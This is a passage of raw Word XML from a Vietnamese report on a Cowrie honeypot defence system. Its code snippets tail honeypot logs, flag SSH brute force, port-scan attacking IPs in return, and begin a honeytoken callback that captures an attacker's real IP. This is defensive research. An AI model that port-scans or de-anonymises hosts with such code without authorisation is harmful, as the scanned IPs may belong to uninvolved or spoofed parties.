                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>logfile = var/log/cowrie/cowrie.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="642620E0"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Trích đoạn cấu hình tùy biến máy bẫy trong tệp tin cowrie.cfg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C82EF5"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4.2 Chi tiết Mã nguồn Phân hệ Thu thập Log Streaming (cowrie_listener.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBE30F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Phân hệ 'CowrieLogListener' được hiện thực hóa với lớp đối tượng chuyên trách theo dõi sự thay đổi của tệp tin log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Khi phát hiện có dòng dữ liệu mới, module lập tức chuyển đổi chuỗi JSON thành dictionary và gọi hàm callback bất đồng bộ:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ab"/>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535EDC65" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9403" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A6943E8"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lastRenderedPageBreak/>
              <w:t>class CowrieLogListener:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    def __init__(self, log_file_path: str, poll_interval: float = 0.5):</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        self.log_file_path = log_file_path</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        self.poll_interval = poll_interval</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        self._running = False</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        self._last_position = 0</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    def start(self, callback: Callable[[dict], None]) -&gt; None:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        self._running = True</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        with open(self.log_file_path, "r", encoding="utf-8") as f:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            f.seek(0, os.SEEK_END) # Nhảy tới cuối tệp để đón log mới</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            while self._running:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                line = f.readline()</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                if not line:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                    time.sleep(self.poll_interval)</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                    continue</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                try:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                    event = json.loads(line.strip())</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                    callback(event)</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                except json.JSONDecodeError:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                    continue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7939E29C"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cơ chế Streaming Log Parser trong core/cowrie_listener.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB7654C"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4.3 Chi tiết Mã nguồn Động cơ Tương quan Sự kiện (correlation_engine.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B5DA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'EventCorrelationEngine' cài đặt cấu trúc dữ liệu ThreatAlert cùng thuật toán Cửa sổ Thời gian Trượt. Module quản lý bộ đếm các lần đăng nhập thất bại theo từng IP nguồn và kiểm tra thời gian tồn tại trong danh sách để phát hiện tấn công brute-force chuẩn xác:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ac"/>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5CCDD178" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9403" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7587261B"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 Xử lý phát hiện Brute Force T1110.001</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>if eventid == "cowrie.login.failed":</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    self.failed_logins[src_ip] = [</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        t for t in self.failed_logins[src_ip] if now - t &lt;= self.window_seconds</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 xml:space="preserve">    self.failed_logins[src_ip].append(now)</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    if len(self.failed_logins[src_ip]) &gt;= self.brute_force_threshold:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        count = len(self.failed_logins[src_ip])</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        self.failed_logins[src_ip].clear()</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        return ThreatAlert(</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            alert_id=f"ALT-BRUTE-{int(now)}",</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            rule_name="Dò quét mật khẩu diện rộng (SSH Brute Force Attack)",</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            mitre_technique_id="T1110.001",</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            mitre_technique_name="Brute Force: Password Guessing",</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            severity="HIGH",</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            source_ip=src_ip,</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            timestamp=timestamp,</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            details={"failed_attempts": count, "target_user": username},</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            recommended_action="tarpit_and_block",</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        )</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5EE9C594"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Đoạn mã thuật toán cửa sổ trượt trong core/correlation_engine.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494DA89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4.4 Chi tiết Mã nguồn Phân hệ Trinh sát ngược Kẻ tấn công (reverse_intel.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4348886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'ReverseIntelligenceEngine' tổng hợp các hàm trinh sát đa nguồn: 'lookup_geoip', 'lookup_abuseipdb', 'lookup_shodan' và 'safe_reverse_port_scan'. Hàm quét cổng ngược sử dụng socket TCP với thời gian chờ 300ms, kết hợp hàm '_classify_threat' để suy luận hình thái đối thủ:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ad"/>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2E2A09D1" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9403" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50A6E849"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def safe_reverse_port_scan(self, ip: str, ports: Optional[List[int]] = None) -&gt; List[int]:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    if ports is None:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        ports = [21, 22, 23, 80, 443, 1080, 3128, 3389, 8080, 8888]</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    open_ports = []</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    for port in ports:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        s.settimeout(0.3)</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        try:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            if s.connect_ex((ip, port)) == 0:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                open_ports.append(port)</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        except Exception:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            pass</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        finally:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            s.close()</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    return open_ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1DC773D7"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quét cổng ngược an toàn trong core/reverse_intel.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B3BB94"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4.5 Chi tiết Mã nguồn Bẫy mồi Honeytoken &amp; Khử ẩn danh (honeytoken_manager.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152FC04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'HoneytokenManager' tự động sinh các tệp tin giả lập nhạy cảm có gắn mã nhận dạng duy nhất (UUID Canary Tokens). Khi kẻ tấn công kích hoạt Webhook, hàm 'process_beacon_callback' bóc tách các trường HTTP Header để lấy IP thật của kẻ tấn công:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ae"/>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18C8B8D8" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9403" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63F067BD"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def process_beacon_callback(self, token_id: str, request_headers: Dict, real_ip: str) -&gt; Dict:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    token_info = self.active_tokens.get(token_id, {})</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    token_info["status"] = "TRIGGERED"</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    token_info["trigger_ip"] = real_ip</w:t>
            </w:r>
